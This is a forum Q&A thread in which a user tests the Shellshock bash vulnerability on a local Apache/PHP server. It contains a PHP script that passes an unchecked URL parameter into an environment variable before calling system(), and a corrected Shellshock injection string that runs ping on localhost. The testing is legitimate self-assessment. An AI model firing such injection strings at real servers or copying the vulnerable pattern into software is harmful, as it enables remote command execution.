0

I have been trying to test shellshock vulnerability on PHP similar to this answer. I am running Apache server with PHP running as mod_php. The PHP version is 5.3.10.

I have a phpfile (phptest.php):

<?php

  function getLang() 
  { 
    if (isset($_GET["lang"]) && !empty($_GET["lang"])) 
    { 
      $lang = $_GET["lang"]; 
    } 
    return $lang; 
  } 
  $language = getLang(); 
  putenv("LANGUAGE=$language");

  system("env | grep LANGUAGE");

 ?>

I tried to access the page via the browser as follows:

localhost/phptest.php?lang=(){:;}; /bin/ping http://localhost

In the linked question, the wget is to the dev's IP, but I just decided to do a ping to see I can test it.

The browser shows the output as follows:

LANGUAGE=(){:;}; /bin/ping http://localhost

I tried to monitor the ping using the following (from this question):

 sudo tcpdump -i lo icmp and icmp[icmptype]=icmp-echo

I didn't see any request. Can someone tell what do I need correct in my test ?

Community
  • 1
Jake
  • 1,095
  • 3
  • 12
  • 20

2 Answers2

1

Asuming that this injection basicly works:

localhost/phptest.php?lang=(){:;}; /bin/ping http://localhost

Your problem is related to the command you try to inject. Ping accepts a hostname as a parameter. But you injected http://localhost as a parameter which is a url and cant be accepted by the ping command. It must be ping localhost instead of ping http://localhost.

davidb
  • 4,285
  • 3
  • 19
  • 31
1

I figured out the problem. Changing to /bin/ping 127.0.0.1 did help, but there was another subtle change to be made.

There needs to be one space between ) & {, and another space between { & :. The revised request was:

localhost/phptest.php?lang=() { :;}; /bin/ping 127.0.0.1

Source for answer was this link.

Jake
  • 1,095
  • 3
  • 12
  • 20